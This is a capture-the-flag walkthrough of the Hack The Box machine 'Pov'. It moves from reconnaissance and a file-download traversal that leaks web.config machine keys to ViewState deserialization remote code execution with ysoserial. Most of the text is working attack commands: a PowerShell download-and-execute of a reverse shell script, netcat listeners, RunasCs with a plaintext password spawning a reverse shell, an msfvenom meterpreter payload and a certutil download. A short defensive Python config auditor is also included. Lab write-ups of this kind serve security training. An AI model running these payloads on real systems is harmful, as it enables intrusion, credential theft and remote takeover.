sudo nmap -Pn -A 10.10.11.251
echo "10.10.11.251 pov.htb" | sudo tee -a /etc/hosts
When I visited port 80 I didn't find anything of interest except the dev subdomain.
dirsearch -u http://pov.htb/
Using ffuf, I will check whether there are any other subdomains for the pov.htb domain.
ffuf -c -ac -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H 'Host: FUZZ.pov.htb' -u http://pov.htb
Only dev came back, so let's add that to /etc/hosts.
echo "10.10.11.251 dev.pov.htb" | sudo tee -a /etc/hosts
There's a download button on this page.
Start the proxy in Burp Suite with intercept turned on. After that, hit the Download CV button.
In the request, we observe the parameter file=cv.pdf. We can attempt to modify the filename to a more sensitive one, such as /web.config, and then send the request. Upon doing so, a file named web.config is downloaded. This file likely contains valuable information for our investigation.
<configuration>
<system.web>
<customErrors mode="On" defaultRedirect="default.aspx" />
<httpRuntime targetFramework="4.5" />
<machineKey decryption="AES" decryptionKey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" validation="SHA1" validationKey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468" />
</system.web>
<system.webServer>
<httpErrors>
<remove statusCode="403" subStatusCode="-1" />
<error statusCode="403" prefixLanguageFilePath="" path="http://dev.pov.htb:8080/portfolio" responseMode="Redirect" />
</httpErrors>
<httpRedirect enabled="true" destination="http://dev.pov.htb/portfolio" exactDestination="false" childOnly="true" />
</system.webServer>
</configuration>
After some Googling, I found this HackTricks article: https://book.hacktricks.xyz/pentesting-web/deserialization/exploiting-__viewstate-parameter
These vulnerabilities arise when the ViewState mechanism is mishandled or improperly secured in ASP.NET web applications, potentially leading to Remote Code Execution (RCE). The leaked web.config gives us both the decryption key and the validation key, which is exactly what an attacker needs to produce ViewState the server will accept. First, we'll need to acquire the ysoserial.exe tool, which generates the malicious payloads. Next, we'll create a PowerShell script for a reverse shell. After placing the script on a Windows VM, we'll use ysoserial.exe with specific parameters to craft a customized ViewState payload, including the encryption and validation keys, the path, and the command that fetches the PowerShell script. Finally, we'll exploit the vulnerability by injecting the customized ViewState payload into the target application. Below are the commands for each step:
Download the ysoserial.exe tool from https://github.com/NHPT/ysoserial.net/releases/ to your Windows virtual machine, and place your reverse shell script rev.ps1 in the directory that the Python HTTP server below will serve. Then generate the ViewState payload with ysoserial.exe (replace EnterKey with the keys from web.config and ip with your listener address):
ysoserial.exe -p ViewState -g TextFormattingRunProperties --decryptionalg="AES" --decryptionkey="EnterKey" --validationalg="SHA1" --validationkey="EnterKey" --path="/portfolio/default.aspx" -c "powershell.exe iex (iwr http://ip:8000/rev.ps1 -UseBasicParsing)"
Terminal 1:
python3 -m http.server 8000
Terminal 2:
nc -nlvp 6666
Visit http://dev.pov.htb, click Download CV and capture the request using Burp Suite. Paste the ysoserial.exe output into the __VIEWSTATE parameter and send the request. We are in the shell of sfitz.
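As an added example (not code from the writeup), here is the check a defender would run on a web.config like the one recovered above: it parses the file and reports why a static machineKey is dangerous. The leaked config is embedded verbatim; the AUTOGEN_CONFIG comparison is a constructed, safe variant.

```python
# Added example, not part of the original writeup: audit a web.config for the
# condition that made the ViewState attack possible, a <machineKey> with static
# secrets that anyone able to read the file can reuse to sign ViewState.
import xml.etree.ElementTree as ET

# The web.config served by the vulnerable download endpoint, embedded verbatim.
WEB_CONFIG = """<configuration>
<system.web>
<customErrors mode="On" defaultRedirect="default.aspx" />
<httpRuntime targetFramework="4.5" />
<machineKey decryption="AES" decryptionKey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" validation="SHA1" validationKey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468" />
</system.web>
</configuration>"""

# Constructed comparison: keys left to ASP.NET auto-generation, HMACSHA256 MAC.
AUTOGEN_CONFIG = """<configuration><system.web>
<machineKey validationKey="AutoGenerate,IsolateApps" decryptionKey="AutoGenerate,IsolateApps" validation="HMACSHA256" />
</system.web></configuration>"""


def audit_machine_key(config_xml: str) -> dict:
    """Report whether <machineKey> exposes static ViewState secrets.

    Returns the algorithms in use plus a list of findings; an empty list means
    reading this file alone does not hand out usable keys.
    """
    root = ET.fromstring(config_xml)
    mk = root.find("system.web/machineKey")
    if mk is None:
        # No element at all: ASP.NET auto-generates keys, nothing leaks here.
        return {"validation": None, "decryption": None, "findings": []}
    validation = mk.get("validation", "HMACSHA256")
    decryption = mk.get("decryption", "Auto")
    findings = []
    for attr, purpose in (("validationKey", "forge the ViewState MAC"),
                          ("decryptionKey", "decrypt and re-encrypt ViewState")):
        value = mk.get(attr, "AutoGenerate")
        if not value.startswith("AutoGenerate"):
            # A hex literal in the file: key length is half the hex length.
            findings.append(f"static {attr} ({len(value) // 2} bytes): lets a reader {purpose}")
    if validation.upper() == "SHA1":
        findings.append("validation=SHA1 is a legacy choice; HMACSHA256 is the modern default")
    return {"validation": validation, "decryption": decryption, "findings": findings}


if __name__ == "__main__":
    for name, cfg in (("leaked web.config", WEB_CONFIG), ("autogenerate", AUTOGEN_CONFIG)):
        result = audit_machine_key(cfg)
        print(name, result["validation"], result["decryption"], result["findings"])
```

The fix on the server side is to stop the download endpoint from serving files outside the intended directory; rotating the machineKey afterwards invalidates anything signed with the leaked keys.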
I found an interesting file in the Documents folder of sfitz which contains the password of the privileged user alaading:
PS C:\Users\sfitz\Documents> type connection.xml
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>System.Management.Automation.PSCredential</T>
<T>System.Object</T>
</TN>
<ToString>System.Management.Automation.PSCredential</ToString>
<Props>
<S N="UserName">alaading</S>
<SS N="Password">...</SS>
</Props>
</Obj>
</Objs>
Let's decrypt this password; see this article for more info: https://mcpmag.com/articles/2017/07/20/save-and-read-sensitive-data-with-powershell.aspx
I use RunasCs to get access as the user alaading. RunasCs is a utility to run specific processes with different permissions than the user's current logon provides, using explicit credentials.
I downloaded RunasCs from https://github.com/antonioCoco/RunasCs/releases to my Kali VM, then unzipped it and placed it in the directory where I set up the python3 HTTP server.
┌──(kali㉿kali)-[~]
└─$ ls
rev.ps1 RunasCs.exe
python3 -m http.server 8000
Now on the Kali machine, create a netcat listener on port 5555:
nc -nlvp 5555
Then on the victim machine, run RunasCs.exe:
.\RunasCs.exe alaading f8gQ8fynP44ek1m3 cmd.exe -r 10.10.16.31:5555
Yeah!!!! We got the user flag.
Looking at the privileges, I found that there is SeDebugPrivilege, which can be used directly with winlogon.
(But there is a question here: why does the PowerShell spawned by RunasCs have SeDebugPrivilege, while cmd does not?)
Use Metasploit to change my shell to one that makes process migration easy (the transfer from the cmd session can be done with certutil.exe's built-in download feature).
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.31 LPORT=6666 -f exe > shell.exe
Start a reverse TCP handler on port 6666:
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 10.10.16.31
set lport 6666
run
So we start a python3 HTTP server on the Kali machine to host our shell.exe, and on the victim machine we use certutil.exe to download it.
python3 -m http.server 8000
certutil.exe -urlcache -split -f http://10.10.16.31:8000/shell.exe shell.exe
Now let’s run the shell.exe